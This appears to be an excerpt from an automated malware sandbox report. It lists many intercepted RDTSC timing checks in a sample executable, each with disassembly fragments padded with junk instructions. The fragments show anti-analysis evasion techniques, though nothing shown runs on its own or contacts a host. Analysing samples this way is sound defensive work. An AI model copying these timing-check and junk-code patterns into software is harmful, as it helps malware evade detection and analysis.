Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70D9EC second address: 70D9F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70DABC second address: 70DAC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70DD07 second address: 70DD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F77291E5964h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70E176 second address: 70E188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70E58B second address: 70E59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F77291E5956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70E59B second address: 70E5E4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F772874F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F772874F648h 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007F772874F63Fh 0x00000016 lea eax, dword ptr [ebp+12491F75h] 0x0000001c mov ecx, dword ptr [ebp+122D2B8Bh] 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 js 00007F772874F636h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70E5E4 second address: 6F3574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, 5960h 0x00000012 cld 0x00000013 call dword ptr [ebp+122D18E9h] 0x00000019 jl 00007F77291E596Fh 0x0000001f pushad 0x00000020 push esi 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop esi 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 756034 second address: 756052 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F772874F644h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 756052 second address: 756056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 756056 second address: 75605C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75605C second address: 756067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7561DE second address: 7561EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F772874F63Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7561EE second address: 756205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jns 00007F77291E5956h 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F77291E5956h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7563D3 second address: 7563D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7563D7 second address: 7563FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E5961h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F77291E595Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7563FE second address: 756403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A278 second address: 75A2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E5969h 0x00000009 jmp 00007F77291E595Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A2A0 second address: 75A2A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A4D0 second address: 75A4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A4D4 second address: 75A4DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A4DA second address: 75A4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A4E6 second address: 75A4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A6B0 second address: 75A6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A6B9 second address: 75A6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75A6BD second address: 75A6EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F77291E5961h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75CE18 second address: 75CE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 75CE1E second address: 75CE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F77291E595Eh 0x0000000a jnl 00007F77291E595Ch 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 760A13 second address: 760A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 760A19 second address: 760A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 760195 second address: 76019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 76019D second address: 7601C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F77291E595Dh 0x0000000c jmp 00007F77291E5965h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7604C7 second address: 7604EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jng 00007F772874F63Eh 0x0000000d ja 00007F772874F636h 0x00000013 pushad 0x00000014 popad 0x00000015 jp 00007F772874F638h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7604EA second address: 76050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F77291E5961h 0x0000000b popad 0x0000000c jmp 00007F77291E595Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7607A3 second address: 7607B9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F772874F636h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F772874F636h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7648E7 second address: 764919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F77291E5956h 0x00000013 jnp 00007F77291E5956h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 764919 second address: 76491D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 76491D second address: 764926 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 76404C second address: 764052 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 764052 second address: 76405C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F77291E5956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 76A1DC second address: 76A21B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F648h 0x00000007 jmp 00007F772874F648h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007F772874F63Eh 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 768B6F second address: 768B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 768F32 second address: 768F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 768F3B second address: 768F50 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F77291E5956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d js 00007F77291E5956h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 768F50 second address: 768F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 768F58 second address: 768F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70DF05 second address: 70DF2C instructions: 0x00000000 rdtsc 0x00000002 je 00007F772874F638h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jmp 00007F772874F646h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70DF2C second address: 70DF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70DF32 second address: 70DF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70DF36 second address: 70DFBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F77291E5958h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dl, 5Dh 0x00000028 sub dword ptr [ebp+122D2FA0h], ebx 0x0000002e mov ebx, dword ptr [ebp+12491FB4h] 0x00000034 mov ecx, edi 0x00000036 call 00007F77291E595Ch 0x0000003b mov dword ptr [ebp+12462731h], esi 0x00000041 pop ecx 0x00000042 add eax, ebx 0x00000044 add dx, AC27h 0x00000049 ja 00007F77291E595Ch 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007F77291E595Fh 0x00000058 pushad 0x00000059 popad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7694B7 second address: 7694E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F772874F63Fh 0x0000000f jnp 00007F772874F636h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7694E3 second address: 7694F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F77291E5956h 0x0000000a jp 00007F77291E5956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 770F8F second address: 770FA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Ch 0x00000007 jo 00007F772874F636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77110E second address: 771171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F77291E5961h 0x0000000b jmp 00007F77291E5965h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jg 00007F77291E5956h 0x00000019 jp 00007F77291E5956h 0x0000001f jmp 00007F77291E595Ch 0x00000024 popad 0x00000025 jmp 00007F77291E5967h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7715A7 second address: 7715B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jne 00007F772874F636h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7715B4 second address: 7715C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E5960h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7718AC second address: 7718D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F772874F63Bh 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 jmp 00007F772874F63Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F772874F636h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 772DAF second address: 772DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F77291E5956h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 772DBC second address: 772DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6D71F7 second address: 6D7214 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F77291E5967h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6D7214 second address: 6D721A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77A426 second address: 77A42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77E0AE second address: 77E0B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F772874F636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77E0B8 second address: 77E0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77E0BE second address: 77E0EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F772874F636h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jno 00007F772874F636h 0x00000011 jmp 00007F772874F648h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77D2C9 second address: 77D2D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77D2D7 second address: 77D2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77D2DD second address: 77D2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77D2E1 second address: 77D2E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77D468 second address: 77D46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77D85E second address: 77D864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77D864 second address: 77D86A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77DB46 second address: 77DB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F772874F63Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77DC97 second address: 77DC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 77DC9B second address: 77DCB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Fh 0x00000007 jp 00007F772874F636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 785C1E second address: 785C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 783D26 second address: 783D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F772874F636h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 783D34 second address: 783D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 783D39 second address: 783D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 784154 second address: 784158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 784158 second address: 78416A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F772874F636h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78441B second address: 784435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E595Ah 0x00000009 pop esi 0x0000000a pushad 0x0000000b jg 00007F77291E5956h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 784435 second address: 78443B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78443B second address: 78445E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F77291E5958h 0x0000000e jmp 00007F77291E5963h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 78445E second address: 784463 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7848A8 second address: 7848AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7848AC second address: 7848B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 784A36 second address: 784A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 784BD8 second address: 784BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 784BDD second address: 784BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
